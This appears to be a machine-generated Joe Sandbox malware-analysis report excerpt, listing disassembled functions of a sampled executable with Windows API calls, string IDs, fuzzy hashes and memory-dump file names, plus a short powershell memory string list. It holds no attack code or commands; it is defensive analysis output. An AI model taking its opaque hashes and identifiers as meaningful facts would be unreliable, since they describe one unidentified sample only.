                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1761009282-0
                                                                                                                                                                            • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                                                                                            • Instruction ID: 425df10adf1626201734122db89ae73073675b0dd07a12218f146994348ff1b2
                                                                                                                                                                            • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                                                                                            • Instruction Fuzzy Hash: ECC04C6944064DD01CA03AB53B637FD33002DA27D5B8D14C1BF41571379E8D080BB837
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FE960F: GetDC.USER32(00000000), ref: 00FE9613
                                                                                                                                                                              • Part of subcall function 00FE960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FE961E
                                                                                                                                                                              • Part of subcall function 00FE960F: ReleaseDC.USER32(00000000,00000000), ref: 00FE9629
                                                                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00FE978E
                                                                                                                                                                              • Part of subcall function 00FE9954: GetDC.USER32(00000000), ref: 00FE995D
                                                                                                                                                                              • Part of subcall function 00FE9954: GetObjectW.GDI32(?,00000018,?), ref: 00FE998C
                                                                                                                                                                              • Part of subcall function 00FE9954: ReleaseDC.USER32(00000000,?), ref: 00FE9A20
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 1061551593-3887548279
                                                                                                                                                                            • Opcode ID: feb26bfec5a16280f5e239d784e48ff3c6307a38374416351d3ed70c98d19650
                                                                                                                                                                            • Instruction ID: 27b9e85a75d370601575424c3d5ef685e06b90fed5f4aadbb1fca8235faddc5b
                                                                                                                                                                            • Opcode Fuzzy Hash: feb26bfec5a16280f5e239d784e48ff3c6307a38374416351d3ed70c98d19650
                                                                                                                                                                            • Instruction Fuzzy Hash: B3611371608241AFD310DFA5C884E6BBBE9FF89704F10491DF599CB261DB72E909CB62
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _swprintf
                                                                                                                                                                            • String ID: %ls$%s: %s
                                                                                                                                                                            • API String ID: 589789837-2259941744
                                                                                                                                                                            • Opcode ID: 1132d62d6147c4db0dadc72882d760a6dd00ab8418dc52cc533cbf58fcc278a5
                                                                                                                                                                            • Instruction ID: 50d2faa5f1cf4a81e6e86ee082127c3a869377cc0a299ce863749a3799e95bdd
                                                                                                                                                                            • Opcode Fuzzy Hash: 1132d62d6147c4db0dadc72882d760a6dd00ab8418dc52cc533cbf58fcc278a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 2251F93368C3C1FAE6311BD68D42F26755ABB44B04F20C507B7CAA84D2DDE568E0B716
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD7575
                                                                                                                                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FD7711
                                                                                                                                                                              • Part of subcall function 00FDA12F: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00FD9F65,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FDA143
                                                                                                                                                                              • Part of subcall function 00FDA12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FD9F65,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FDA174
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Attributes$H_prologTime
                                                                                                                                                                            • String ID: :
                                                                                                                                                                            • API String ID: 1861295151-336475711
                                                                                                                                                                            • Opcode ID: 7b1ec850f5feaec9ffc67ca77eff2b6d977c978dcd42713a4b9fd966fbca9a51
                                                                                                                                                                            • Instruction ID: 6c0b678581381a170073c27e105221c28b45d68ad0bd4f05493debc5b2af608e
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b1ec850f5feaec9ffc67ca77eff2b6d977c978dcd42713a4b9fd966fbca9a51
                                                                                                                                                                            • Instruction Fuzzy Hash: 4441B671805218AADB25FB60CC55EEF777EAF45300F08409BB545A7282EB785F88EF61
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: UNC$\\?\
                                                                                                                                                                            • API String ID: 0-253988292
                                                                                                                                                                            • Opcode ID: ff461b2b1903e2b19a7e31424fa17dc3d82bc29f906a57fec65c2ee413847d0f
                                                                                                                                                                            • Instruction ID: c0b3d35e0f7031b66f7b9aabce6bc9c76da3e4b648690143c96aeee876b020c5
                                                                                                                                                                            • Opcode Fuzzy Hash: ff461b2b1903e2b19a7e31424fa17dc3d82bc29f906a57fec65c2ee413847d0f
                                                                                                                                                                            • Instruction Fuzzy Hash: 2441B231800218FACF21EF61CC45EAE376BAF06765F19806BF95993342D7789984FB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00FFEA9F,00000000,00000000,00000000,00000000,00000000,00FF3FBF), ref: 00FFE70C
                                                                                                                                                                            • GetLastError.KERNEL32(?,00FFEA9F,00000000,00000000,00000000,00000000,00000000,00FF3FBF,00000000,00FF3FBF,0100AA70,00000010,00FFD947,00000000,0100A9E8,00000010), ref: 00FFE735
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 442123175-3080146196
                                                                                                                                                                            • Opcode ID: a1354b0ab7181ddcf568cc66019a00c3fc0c973b49b415704fb33b43d8c56063
                                                                                                                                                                            • Instruction ID: 14e527500a06b967ae122b898237815015253d266c11398ed30533ed85583610
                                                                                                                                                                            • Opcode Fuzzy Hash: a1354b0ab7181ddcf568cc66019a00c3fc0c973b49b415704fb33b43d8c56063
                                                                                                                                                                            • Instruction Fuzzy Hash: 20317172A102199FCB24DF59CC80AAAB3FAEF58311F1044AAE659D7261E730AD81DB50
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00FFEABF,00000000,00000000,00000000,00000000,00000000,00FF3FBF), ref: 00FFE61E
                                                                                                                                                                            • GetLastError.KERNEL32(?,00FFEABF,00000000,00000000,00000000,00000000,00000000,00FF3FBF,00000000,00FF3FBF,0100AA70,00000010,00FFD947,00000000,0100A9E8,00000010), ref: 00FFE647
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 442123175-3080146196
                                                                                                                                                                            • Opcode ID: d1e81a8fd8ad6ae8ba9c11902953fec4b1142c8d5ecbab6b9617797b9db8620f
                                                                                                                                                                            • Instruction ID: 3c4100024a86b61e8601c2eb6c250c698814595a791a5f15cbc2b101f9e5e06f
                                                                                                                                                                            • Opcode Fuzzy Hash: d1e81a8fd8ad6ae8ba9c11902953fec4b1142c8d5ecbab6b9617797b9db8620f
                                                                                                                                                                            • Instruction Fuzzy Hash: B321B175A0021D9FCB25CF59C880BE9B3F9EF48315F1444AAE64AD3261D730AD85DF20
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Shell.Explorer$about:blank
                                                                                                                                                                            • API String ID: 0-874089819
                                                                                                                                                                            • Opcode ID: 721e2b3fa0d6c5f68d1d7e958b868f2770517baf378a2bd3e4344a36118bce25
                                                                                                                                                                            • Instruction ID: 8809c76ad9f20b4c15420c0c65cc8885f354c7a255163b93c0db7d05b18fd9ce
                                                                                                                                                                            • Opcode Fuzzy Hash: 721e2b3fa0d6c5f68d1d7e958b868f2770517baf378a2bd3e4344a36118bce25
                                                                                                                                                                            • Instruction Fuzzy Hash: 44216571700686BFD705EFB2CC95E65B368BF45750B04412AF5198B681DFB8EC12DBA0
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(000304CA), ref: 00FECA6D
                                                                                                                                                                            • DialogBoxParamW.USER32(GETPASSWORD1,000304CA,00FEA0B0,?,?), ref: 00FECAA9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DialogParamVisibleWindow
                                                                                                                                                                            • String ID: GETPASSWORD1
                                                                                                                                                                            • API String ID: 3157717868-3292211884
                                                                                                                                                                            • Opcode ID: 474f8a8a94f6cf5dd51ca095c2b30354ec27f24ee7be270a835e84f92a1f50aa
                                                                                                                                                                            • Instruction ID: 331e60545a26e135502a141da50b16361d3723fa4e4bec6de2aef91bad462a56
                                                                                                                                                                            • Opcode Fuzzy Hash: 474f8a8a94f6cf5dd51ca095c2b30354ec27f24ee7be270a835e84f92a1f50aa
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D113B3260028C6ADB22ED76DC05BBA3798B709B20F044079FD89AB184C6BD5C41E3E4
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FEE82E
                                                                                                                                                                            • ___raise_securityfailure.LIBCMT ref: 00FEE915
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 3761405300-3080146196
                                                                                                                                                                            • Opcode ID: 341c557e7b0a82f39c7e09abf7ad08e87128213fde62389bad535cdb889971c1
                                                                                                                                                                            • Instruction ID: 37610eec051a64903b1b3ee5754eca433dd0f88b11d5a841ec5820d02924d904
                                                                                                                                                                            • Opcode Fuzzy Hash: 341c557e7b0a82f39c7e09abf7ad08e87128213fde62389bad535cdb889971c1
                                                                                                                                                                            • Instruction Fuzzy Hash: A32112B55002069ED7B1CF55F641E447BB4FF0EB90F20402BE988CB399E3BA9980CB80
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FDD70B: _swprintf.LIBCMT ref: 00FDD731
                                                                                                                                                                              • Part of subcall function 00FDD70B: _strlen.LIBCMT ref: 00FDD752
                                                                                                                                                                              • Part of subcall function 00FDD70B: SetDlgItemTextW.USER32(?,0100D154,?), ref: 00FDD7B2
                                                                                                                                                                              • Part of subcall function 00FDD70B: GetWindowRect.USER32(?,?), ref: 00FDD7EC
                                                                                                                                                                              • Part of subcall function 00FDD70B: GetClientRect.USER32(?,?), ref: 00FDD7F8
                                                                                                                                                                            • GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 2622349952-4108050209
                                                                                                                                                                            • Opcode ID: f9cf46b14cafd28803abe6be15faa0c1fe7f3f4a4ebed4aad27bed6ce1d4216c
                                                                                                                                                                            • Instruction ID: c1b6c2843af3a3bfb3bc6b11f44898677e0604f2bfed202273b116ac0574e0a4
                                                                                                                                                                            • Opcode Fuzzy Hash: f9cf46b14cafd28803abe6be15faa0c1fe7f3f4a4ebed4aad27bed6ce1d4216c
                                                                                                                                                                            • Instruction Fuzzy Hash: C5F03C70940248B6DF261EA08C49AF93B5BBB14394F08800ABCC895695C779C9B4FB60
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free
                                                                                                                                                                            • String ID: 6P+$FlsFree
                                                                                                                                                                            • API String ID: 3978063606-1299238597
                                                                                                                                                                            • Opcode ID: a6679497220853cbaf36f6328dbc9a2feddaa168a7f0d3aad9a5d9b573de994a
                                                                                                                                                                            • Instruction ID: 46253cd1134af6e842506701bbd0b2ed17753d370c3b53a788e82998c64ba296
                                                                                                                                                                            • Opcode Fuzzy Hash: a6679497220853cbaf36f6328dbc9a2feddaa168a7f0d3aad9a5d9b573de994a
                                                                                                                                                                            • Instruction Fuzzy Hash: 1DE02031A4420C678622AFA1AC0AF3EBB64DF44B10F01005CFF055B280CAA64E00A7C9
                                                                                                                                                                            APIs
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00FE05D9,?,?,00FE064E,?,?,?,?,?,00FE0638), ref: 00FE04C0
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00FE064E,?,?,?,?,?,00FE0638), ref: 00FE04CC
                                                                                                                                                                              • Part of subcall function 00FD6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD6CEC
                                                                                                                                                                            Strings
                                                                                                                                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00FE04D5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                            • API String ID: 1091760877-2248577382
                                                                                                                                                                            • Opcode ID: 85fa7adb38a599aa55427cca2aa91e6ba2bbf2718f175bd8c9f882a4e75911a4
                                                                                                                                                                            • Instruction ID: 3037b4647e7fafba64e85ec39cac13ce3e4f776b2114f581987ad352ad9b51e9
                                                                                                                                                                            • Opcode Fuzzy Hash: 85fa7adb38a599aa55427cca2aa91e6ba2bbf2718f175bd8c9f882a4e75911a4
                                                                                                                                                                            • Instruction Fuzzy Hash: 29D02E3180813127DA126324AC0EEAE38078B22330F258B1DF2B5A43EECE290CC092D1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00FDCFBE,?), ref: 00FDD6C6
                                                                                                                                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00FDCFBE,?), ref: 00FDD6D4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FindHandleModuleResource
                                                                                                                                                                            • String ID: RTL
                                                                                                                                                                            • API String ID: 3537982541-834975271
                                                                                                                                                                            • Opcode ID: 9ea1da3842997f472352c350b7d94c31ad9d32ac897b5328af09efbc0ebc4099
                                                                                                                                                                            • Instruction ID: 9df10a6fc664b9a24618dc2c6b780703c4093e61d6ad242ade5b485dcf1355ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ea1da3842997f472352c350b7d94c31ad9d32ac897b5328af09efbc0ebc4099
                                                                                                                                                                            • Instruction Fuzzy Hash: A5C0123168131266EB325B316C0DF832A4A6B04B22F190449B2C5DA2C5DEAAC844C7A0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $a%k$$a%k$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$pipj$pipj$pipj$pipj$pipj$tP^q$tP^q$tP^q$tP^q$tP^q$tP^q$|,rj$$^q$$^q$$^q
